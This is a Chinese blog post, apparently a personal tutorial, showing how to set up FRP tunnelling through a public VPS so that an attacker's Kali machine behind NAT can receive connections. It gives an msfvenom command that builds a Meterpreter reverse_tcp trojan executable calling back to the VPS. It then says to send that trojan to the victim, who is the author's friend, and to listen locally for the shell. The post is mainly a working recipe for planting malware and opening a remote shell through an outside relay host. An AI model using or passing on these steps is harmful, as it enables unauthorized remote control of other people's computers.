当前位置:首页 » 《随便一记》 » 正文

Frp实现内网穿透

26 人参与  2022年11月07日 14:25  分类 : 《随便一记》  评论

点击全文阅读


FRP介绍

frp 是一个高性能的反向代理应用,支持 tcp, udp, http, https 协议。

https://github.com/fatedier/frp/releases

可以根据不同的需要选择不同的版本,我用的是linux进行测试

 

流程介绍

因为黑客机处于内网,受害机也处于内网,他们不能直接通信

此时就需要一个公网的ip来扮演“中间人”的角色,让他们俩个能够成功的通信

演示

环境

黑客机就用我虚拟机中的kali

VPS用的阿里云服务器,只要是公网的ip就可以

受害机用的我朋友的电脑

步骤

服务端

将frp通过xftp上传到VPS上

 vim打开frps.ini进行编辑,此处的端口为frp服务的端口,token为密钥,设置完后就必须通过token来连接frp服务

 编辑完后保存运行启动frp服务

 

客户端

kali这里也需要下载frp然后进行解压

 vim打开frpc.ini进行编辑

server_addr为vps的ip

server_port为vps上开放的frp服务端口

token为frp服务的上设置的token

local_ip为frp服务端将数据返回到的客户端ip

local_port为frp服务端将数据返回到的客户端端口

remote_port这个端口自定义,配置完成后会在公网服务器开启6000端口,将数据通过这个端口来映射到客户端的5555端口

 

运行,这样就连接上了


 

msf生成木马exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器ip lport=6000 -f exe -o shell.exe

 将木马发送给受害者,并监听本地的5555端口

 当受害者运行后,将数据发送给vps的6000端口,vps再通过6000端口发送给黑客机本地的5555端口,所以当受害者运行木马后数据就会到黑客机本地的5555端口

 

整体流程:

黑客机去连接vps的6677端口的frp服务,连接上后就会用本地的5555端口和服务端的6000端口互相映射,黑客机将数据通过本地5555端口发送到vps的6000端口,vps的6000端口和受害者进行通信,因为受害者反向连接是可以访问到vps的。


点击全文阅读


本文链接:http://zhangshiyu.com/post/47262.html

<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1